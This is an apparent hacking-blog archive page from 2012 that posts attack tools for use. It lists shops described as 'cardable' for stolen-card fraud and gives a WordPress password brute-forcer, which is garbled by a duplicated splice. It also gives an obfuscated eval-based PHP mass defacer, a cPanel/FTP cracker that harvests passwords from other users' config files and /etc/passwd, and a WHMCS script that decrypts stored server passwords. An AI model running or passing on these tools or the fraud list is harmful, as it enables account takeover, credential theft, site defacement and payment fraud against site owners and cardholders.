Home » Archives for November 2012

Cardable shoplist

Posted by Yas Wednesday 14 November 2012 0 comments

http://de.europe.creative.com/shop/
www.conrad.de
www.sonyericsson-shop.de
www.sonystyle.de 
www.sheesha24.de
www.thehookah.com
www.uhrzeit.org
www.vodkahaus.de
www.sensiseeds.com
www.greenhouseseeds.nl/shop/
www.thalia.de
www.eukasa.de 
www.pc-cooling.de
www.ipc-computer.de
www.messerundmehr.de
www.metaltix.com 
www.nuclearblast.de
www.ichwillkaffee.de
www.angelsport.de 
www.alternate.de
www.x-tra-x.de/
www.titus.de
www.sportloebl.de/index.php
www.games-workshop.com/
www.gwindi.net
www.kotte-zeller.de
www.quelle.de 
www.fleshlight-shop.de
www.ticket-online.de
www.elevator.de/ 
www.bankowski.de
www.jowenga.com/shop/
www.thejewellershop.com/
www.buyplanet.de 
www.sip-scootershop.de
www.scootercenter.de
www.racing-planet.de
www.printus24home.de
www.hifistudio.de
www.myby.com
www.actionsports.de
www.sportuhren.de
https://www.ebrosia.de
www.watchoo.com
http://www.pharmatheke.com
www.technikdirekt.de
www.plus.de
www.conrad.de
www.doit24.de
www.alternate.de
www.temeon.de
www.medionshop.de
www.passiontec.de
www.epson.de
www.iphoneohnevertrag.com
www.worldofsweets.de
www.apple.de
www.caraudio-versand.de
www.neckermann.de
www.qvc.de

cPanel WHM Account Creator 1.1

Posted by Yas 0 comments
<?php  ############################################################### # cPanel WHM Account Creator 1.1 ############################################################### # Visit http://www.zubrag.com/scripts/ for updates ############################################################### # Required parameters: # - domain - new account domain # - user - new account username # - password - new account password # - package - new account hosting package (plan) # - email - contact email # # Sample run: create-whm-account.php?domain=reseller.com&user=hosting&password=manager&package=unix_500 # # If no parameters passed then input form will be shown to enter data. # # This script can also be run from another PHP script. This may # be helpful if you have some user interface already in place and  # want to automatically create WHM accounts from there. # In this case you have to setup following variables instead of # passing them as parameters: # - $user_domain - new account domain # - $user_name - new account username # - $user_pass - new account password # - $user_plan - new account hosting package (plan) # - $user_email - contact email # ###############################################################  ///////  YOUR WHM LOGIN DATA $whm_user   = "root";      // reseller username $whm_pass   = "password";  // the password you use to login to WHM  ##################################################################################### ##############          END OF SETTINGS. DO NOT EDIT BELOW    ####################### #####################################################################################  $whm_host   = $_SERVER['HTTP_HOST'];  function getVar($name, $def = '') {   if (isset($_REQUEST[$name]))     return $_REQUEST[$name];   else     return $def; }  // Domain name of new hosting account // To create subdomain just pass full subdomain name // Example: newuser.zubrag.com if (!isset($user_domain)) {   $user_domain = getVar('domain'); }  // Username of the new hosting account if (!isset($user_name)) {   $user_name = getVar('user'); }  // Password for the new hosting account if (!isset($user_pass)) {   $user_pass = getVar('password'); }  // New hosting account Package if (!isset($user_plan)) {   $user_plan = getVar('package'); }  // Contact email if (!isset($user_email)) {   $user_email = getVar('email'); }  // if parameters passed then create account if (!empty($user_name)) {    // create account on the cPanel server   $script = "http://{$whm_user}:{$whm_pass}@{$whm_host}:2086/scripts/wwwacct";   $params = "?plan={$user_plan}&domain={$user_domain}&username={$user_name}&password={$user_pass}&contactemail={$user_email}";   $result = file_get_contents($script.$params);    // output result   echo "RESULT: " . $result; } // otherwise show input form else { $frm = <<<EOD <html> <head>   <title>cPanel/WHM Account Creator</title>   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">   <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> </head> <body>   <style>     input { border: 1px solid black; }   </style> <form method="post"> <h3>cPanel/WHM Account Creator</h3> <table border="0"> <tr><td>Domain:</td><td><input name="domain" size="30"></td><td>Subdomain or domain, without www</td></tr> <tr><td>Username:</td><td><input name="user" size="30"></td><td>Username to be created</td></tr> <tr><td>Password:</td><td><input name="password" size="30"></td><td></td></tr> <tr><td>Package:</td><td><input name="package" size="30"></td><td>Package (hosting plan) name. Make sure you cpecify existing package</td></tr> <tr><td>Contact Email:</td><td><input name="email" size="30"></td><td></td></tr> <tr><td colspan="3"><br /><input type="submit" value="Create Account"></td></tr> </table> </form> </body> </html> EOD; echo $frm; }  ?>

 ENJOY :D

wordpress bruteforce script in python

Posted by Yas 0 comments
#!/usr/bin/python

#WordPress Brute Force (wp-login.php)

 

#If cookies enabled brute force will not work (yet)

#Change response on line 97 if needed. (language)

 

#Dork: inurl:wp-login.php

 

#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com 

 

import urllib2, sys, re, urllib, httplib, socket

 

print "\n   d3hydr8[at]gmail[dot]com WordPressBF "

print "----------------------------------------------"

 

if len(sys.argv) not in [4,5,6,7]:

        print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\#!/usr/bin/python

#WordPress Brute Force (wp-login.php)

 

#If cookies enabled brute force will not work (yet)

#Change response on line 97 if needed. (language)

 

#Dork: inurl:wp-login.php

 

#http://www.darkc0de.com

#ilyasrobert[at]gmail[dot]com 

 

import urllib2, sys, re, urllib, httplib, socket

 

print "\n   ilyasrobert[at]gmail[dot]com WordPressBF "

print "----------------------------------------------"

 

if len(sys.argv) not in [4,5,6,7]:

        print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"

        print "\t   -p/-proxy <host:port> : Add proxy support"

        print "\t   -v/-verbose : Verbose Mode\n"

        sys.exit(1)

        

for arg in sys.argv[1:]:

        if arg.lower() == "-p" or arg.lower() == "-proxy":

               proxy = sys.argv[int(sys.argv[1:].index(arg))+2]

        if arg.lower() == "-v" or arg.lower() == "-verbose":

               verbose = 1

               

try:

        if proxy:

               print "\n[+] Testing Proxy..."

               h2 = httplib.HTTPConnection(proxy)

               h2.connect()

               print "[+] Proxy:",proxy

except(socket.timeout):

        print "\n[-] Proxy Timed Out"

        proxy = 0

        pass

except(NameError):

        print "\n[-] Proxy Not Given"

        proxy = 0

        pass

except:

        print "\n[-] Proxy Failed"

        proxy = 0

        pass

        

try:

        if verbose == 1:

               print "[+] Verbose Mode On\n"

except(NameError):

        print "[-] Verbose Mode Off\n"

        verbose = 0

        pass

        

if sys.argv[1][:7] != "http://":

        host = "http://"+sys.argv[1]

else:

        host = sys.argv[1]

        

print "[+] BruteForcing:",host

print "[+] User:",sys.argv[2]

 

try:

        words = open(sys.argv[3], "r").readlines()

        print "[+] Words Loaded:",len(words),"\n"

except(IOError): 

        print "[-] Error: Check your wordlist path\n"

        sys.exit(1)

  

for word in words:

        word = word.replace("\r","").replace("\n","")

        login_form_seq = [

        ('log', sys.argv[2]),

        ('pwd', word),

        ('rememberme', 'forever'),

        ('wp-submit', 'Login >>'),

               ('redirect_to', 'wp-admin/')]

        login_form_data = urllib.urlencode(login_form_seq)

        if proxy != 0:

               proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})

               opener = urllib2.build_opener(proxy_handler)

        else:

               opener = urllib2.build_opener()

        try:

               site = opener.open(host, login_form_data).read()

        except(urllib2.URLError), msg:

               print msg

               site = ""

               pass

 

        if re.search("WordPress requires Cookies",site):

               print "[-] Failed: WordPress has cookies enabled\n"

               sys.exit(1)

               

        #Change this response if different. (language)

        if re.search("<strong>ERROR</strong>",site) and verbose == 1:

               print "[-] Login Failed:",word

        else:

               print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"

               sys.exit(1)

print "\n[-] Brute Complete\n"n"

        print "\t   -p/-proxy <host:port> : Add proxy support"

        print "\t   -v/-verbose : Verbose Mode\n"

        sys.exit(1)

        

for arg in sys.argv[1:]:

        if arg.lower() == "-p" or arg.lower() == "-proxy":

               proxy = sys.argv[int(sys.argv[1:].index(arg))+2]

        if arg.lower() == "-v" or arg.lower() == "-verbose":

               verbose = 1

               

try:

        if proxy:

               print "\n[+] Testing Proxy..."

               h2 = httplib.HTTPConnection(proxy)

               h2.connect()

               print "[+] Proxy:",proxy

except(socket.timeout):

        print "\n[-] Proxy Timed Out"

        proxy = 0

        pass

except(NameError):

        print "\n[-] Proxy Not Given"

        proxy = 0

        pass

except:

        print "\n[-] Proxy Failed"

        proxy = 0

        pass

        

try:

        if verbose == 1:

               print "[+] Verbose Mode On\n"

except(NameError):

        print "[-] Verbose Mode Off\n"

        verbose = 0

        pass

        

if sys.argv[1][:7] != "http://":

        host = "http://"+sys.argv[1]

else:

        host = sys.argv[1]

        

print "[+] BruteForcing:",host

print "[+] User:",sys.argv[2]

 

try:

        words = open(sys.argv[3], "r").readlines()

        print "[+] Words Loaded:",len(words),"\n"

except(IOError): 

        print "[-] Error: Check your wordlist path\n"

        sys.exit(1)

  

for word in words:

        word = word.replace("\r","").replace("\n","")

        login_form_seq = [

        ('log', sys.argv[2]),

        ('pwd', word),

        ('rememberme', 'forever'),

        ('wp-submit', 'Login >>'),

               ('redirect_to', 'wp-admin/')]

        login_form_data = urllib.urlencode(login_form_seq)

        if proxy != 0:

               proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})

               opener = urllib2.build_opener(proxy_handler)

        else:

               opener = urllib2.build_opener()

        try:

               site = opener.open(host, login_form_data).read()

        except(urllib2.URLError), msg:

               print msg

               site = ""

               pass

 

        if re.search("WordPress requires Cookies",site):

               print "[-] Failed: WordPress has cookies enabled\n"

               sys.exit(1)

               

        #Change this response if different. (language)

        if re.search("<strong>ERROR</strong>",site) and verbose == 1:

               print "[-] Login Failed:",word

        else:

               print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"

               sys.exit(1)


print "\n[-] Brute Complete\n"


CARA PAKAI:
linux:
./wpbute.py http://site.com/wp-login.php admin common.txt -p 174.143.95.234:80 -v
windows :
wpbute.py http://site.com/wp-login.php admin common.txt -p 174.143.95.234:80 -v
PREVIEW :


[PHP] Mass subdomain maker and auto defacer

Posted by Yas 0 comments

SREENSHOT :

[+] Save wordlist for subdomain in /public_html/ directory and name it as "domains.txt" 


<?php /* coded by force ex  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x18d0;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUxMyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnaWxvdmVhaEhBTEVWT0lCYkNjRGRGZkdnSmpLa01tTm5QcFFxUnJTc1R0VXVXd1h4WXlaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>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sf[|GL~Y



ENJOY :D

Cpanel/Ftp Cracker Script

Posted by Yas 1 comment

<?php 
echo "<html>"; 
echo "<title>Crack Cpanel/FTP </title><body>"; 

 set_time_limit(0); 
################## 
@$passwd=fopen('/etc/passwd','r'); 
if (!$passwd) { 
   echo "[-] Error : coudn't read /etc/passwd"; 
   exit; 

$path_to_public=array(); 
$users=array(); 
$pathtoconf=array(); 
$i=0; 

 while(!feof($passwd)) { 
  $str=fgets($passwd); 
  if ($i>35) { 
    $pos=strpos($str,":"); 
    $username=substr($str,0,$pos); 
    $dirz="/home/$username/public_html/"; 
    if (($username!="")) { 
        if (is_readable($dirz)) { 
            array_push($users,$username); 
            array_push($path_to_public,$dirz); 
        } 
    } 
  } 
  $i++; 

################### 

 ######################### 
echo "<br><br>"; 
echo "<textarea name='main_window' cols=100 rows=20>"; 

 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; 
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n"; 

 echo "[~] Searching for passwords in config.* files...\n\n"; 
foreach ($users as $user) { 
        $path="/home/$user/public_html/"; 
        read_dir($path,$user); 


 echo "\n[+] Done\n"; 

 function read_dir($path,$username) { 
    if ($handle = opendir($path)) { 
        while (false !== ($file = readdir($handle))) { 
              $fpath="$path$file"; 
              if (($file!='.') and ($file!='..')) { 
                 if (is_readable($fpath)) { 
                    $dr="$fpath/"; 
                    if (is_dir($dr)) { 
                       read_dir($dr,$username); 
                    } 
                    else { 
                         if (($file=='config.php') or ($file=='config.inc.php') or ($file=='configuration.inc') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or  ($file=='func.php') or ($file=='fun.php') or ($file=='function.php') or ($file=='settings.php') or ($file=='mysqlconnect.php') or ($file=='mysql.php') or ($file=='configuration.php') or ($file=='db_config.php') or ($file=='db_connect.php')) { 
                            $pass=get_pass($fpath); 
                            if ($pass!='') { 
                               echo "[+] $fpath\n$pass\n"; 
                               ftp_check($username,$pass); 
                            } 
                         } 
                    } 
                 } 
              } 
        } 
    } 


 function get_pass($link) { 
    @$config=fopen($link,'r'); 
    while(!feof($config)) { 
        $line=fgets($config); 
        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { 
            if (strrpos($line,'"')) 
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); 
            else 
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); 
            return $pass; 
        } 
    } 


 function ftp_check($login,$pass) { 
     @$ftp=ftp_connect('127.0.0.1'); 
     if ($ftp) { 
        @$res=ftp_login($ftp,$login,$pass); 
        if ($res) { 
           echo '[FTP] '.$login.':'.$pass."  Success\n"; 
        } 
        else ftp_quit($ftp); 
     } 


 echo "</textarea><br>"; 
echo "</body></html>"; 
?>  

WHMCS Server Password decoder-Advance script

Posted by Yas 0 comments

<?php

 ###########################################
# WHMCS Server Password decoder #
# #
# recoded by ilyas_robert
#Note : I'm Proud to be ~~h4ck3r~~ #
####################################
function decrypt ($string,$cc_encryption_hash)
{
$key = md5 (md5 ($cc_encryption_hash)) . md5
($cc_encryption_hash);
$hash_key = _hash ($key);
$hash_length = strlen ($hash_key);
$string = base64_decode ($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) -
$hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length,
$hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string
[$c]));
++$c;
}
return $out;
}
function _hash ($string)
{
if (function_exists ('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
if($_POST['form_action'] == 1 )
{
//include($file);
$file=($_POST['file']);
$****=file_get_contents($file);
$****= str_replace("<?php", "", $****);
$****= str_replace("<?", "", $****);
$****= str_replace("?>", "", $****);
eval($****);
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$user**** = $v['user****'];
$type = $v['type'];
$active = $v['active'];
$host**** = $v['host****'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Host****</td><td>$host****</td></
tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>User****</td><td>$user****</td></
tr>");
echo("<tr><td>Password</td><td>$password</td></
tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
